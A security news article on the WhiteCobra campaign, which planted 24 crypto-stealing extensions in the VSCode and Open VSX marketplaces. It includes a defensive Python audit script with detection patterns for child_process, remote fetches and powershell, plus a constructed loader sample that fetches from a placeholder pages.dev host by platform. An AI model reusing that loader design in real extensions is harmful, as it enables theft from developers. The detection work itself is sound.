A threat actor named WhiteCobra has infiltrated the Visual Studio Code marketplace and the Open VSX registry with 24 malicious extensions targeting developers who use the VSCode, Cursor, and Windsurf editors.
Campaign overview
The ongoing campaign is a sophisticated operation that researchers at Koi Security have been tracking for over a year. WhiteCobra is the same group responsible for a $500,000 cryptocurrency theft in July 2025, and the campaign shows its evolution from basic PowerShell miners to advanced crypto-stealing malware.
The campaign gained significant attention when Ethereum developer Zak Cole, a security professional with a decade of experience, had his wallet drained after installing what appeared to be a legitimate extension called "contractshark.solidity-lang" for the Cursor editor. The extension featured professional design elements and detailed descriptions, and showed 54,000 downloads on OpenVSX, which illustrates the deception techniques employed.
Attack methodology
WhiteCobra deployed extensions across both platforms under names such as ChainDevTools.solidity-pro, kilocode-ai.kilo-code, juan-blanco.solidity, and VitalikButerin-EthFoundation.blan-co. These extensions specifically target cryptocurrency-related development tooling, in particular Solidity smart contract development extensions.
The malicious extensions execute through a multi-stage payload delivery chain. The main extension file looks identical to standard VSCode boilerplate code but contains a hidden call to a secondary script, which downloads platform-specific payloads from Cloudflare Pages.
On Windows systems, the payload executes PowerShell scripts that deploy Python code containing shellcode to run LummaStealer malware.
This info-stealer targets cryptocurrency wallets, browser credentials, web extensions, and messaging application data.
On macOS systems, the payload deploys a malicious Mach-O binary that loads an as yet unidentified malware family, demonstrating cross-platform capability.
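The loader pattern described above (a boilerplate-looking entry file that quietly requires a second local script, which then branches on platform and fetches from a remote host) can be audited for on a developer machine. The following is an added example, not code from the article or from Koi Security: it follows an extension's `main` entry through its local `require()` chain and reports heuristic indicators, and `demo()` runs it on a constructed sample whose `PLACEHOLDER.pages.dev` host and file names are invented for illustration.

```python
import json
import re
import tempfile
from pathlib import Path

# Indicators of a downloader/launcher stage. One alone is common in honest extensions;
# several together inside a "language support" extension deserve a manual look.
INDICATORS = {
    "child_process": r"require\(\s*['\"]child_process['\"]\s*\)",
    "remote_fetch": r"\b(https?\.get|fetch|axios)\s*\(",
    "cloudflare_pages": r"[a-z0-9-]+\.pages\.dev",
    "platform_branch": r"process\.platform",
    "powershell": r"powershell",
}
LOCAL_REQUIRE = re.compile(r"require\(\s*['\"](\.{1,2}/[^'\"]+)['\"]\s*\)")

def local_modules(entry, seen=None):
    """Return the entry file plus every local module it requires, transitively."""
    seen = [] if seen is None else seen
    if entry.is_file() and entry not in seen:
        seen.append(entry)
        for rel in LOCAL_REQUIRE.findall(entry.read_text(errors="ignore")):
            dep = entry.parent / rel
            local_modules(dep if dep.suffix else dep.with_suffix(".js"), seen)
    return seen

def audit_extension(ext_dir):
    """Scan one extension directory: entry path, files followed, indicator hits per file."""
    pkg = json.loads((ext_dir / "package.json").read_text())
    entry = ext_dir / pkg.get("main", "extension.js")
    entry = entry if entry.suffix else entry.with_suffix(".js")
    hits, files = {}, local_modules(entry)
    for f in files:
        src = f.read_text(errors="ignore")
        for name, pat in INDICATORS.items():
            if re.search(pat, src, re.I):
                hits.setdefault(name, []).append(f.name)
    return {"entry": str(entry), "files": len(files), "hits": hits}

def demo():
    """Constructed sample, not a real campaign file: stock boilerplate whose activate() pulls in
    a second local script that branches on platform and fetches from a placeholder Pages host."""
    ext = Path(tempfile.mkdtemp())
    (ext / "package.json").write_text(json.dumps({"name": "sample-lang", "main": "./extension.js"}))
    (ext / "extension.js").write_text("const vscode = require('vscode');\n"
        "function activate(ctx) { require('./prettier')(ctx); }\nmodule.exports = { activate };\n")
    (ext / "prettier.js").write_text("const https = require('https');\nmodule.exports = () =>"
        " https.get('https://PLACEHOLDER.pages.dev/' + process.platform, () => {});\n")
    return audit_extension(ext)
```

To audit an installed set, call `audit_extension` on each directory under `~/.vscode/extensions`, `~/.cursor/extensions` or `~/.windsurf/extensions` (assumed default locations) and review any extension with several hits; the boilerplate entry file itself produces none, which is exactly why the local require chain has to be followed.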
Operational sophistication
WhiteCobra operates with remarkable organization and persistence. The group maintains detailed playbooks with revenue targets ranging from $10,000 to $500,000, provides command-and-control infrastructure setup guides, and employs social engineering and marketing strategies to make its extensions appear legitimate.
The threat actors manipulate download counts, ratings, and reviews to establish credibility, which makes detection extremely difficult for users. When extensions are removed, WhiteCobra can deploy replacement campaigns in under three hours, demonstrating its resilience and operational efficiency.
Ongoing threat
Despite security researchers reporting and removing malicious extensions, WhiteCobra continues to upload new malicious code weekly, making this an active and persistent threat to the developer community. The campaign's success against experienced security professionals underscores the sophistication of these attacks and the urgent need for improved verification mechanisms in extension marketplaces.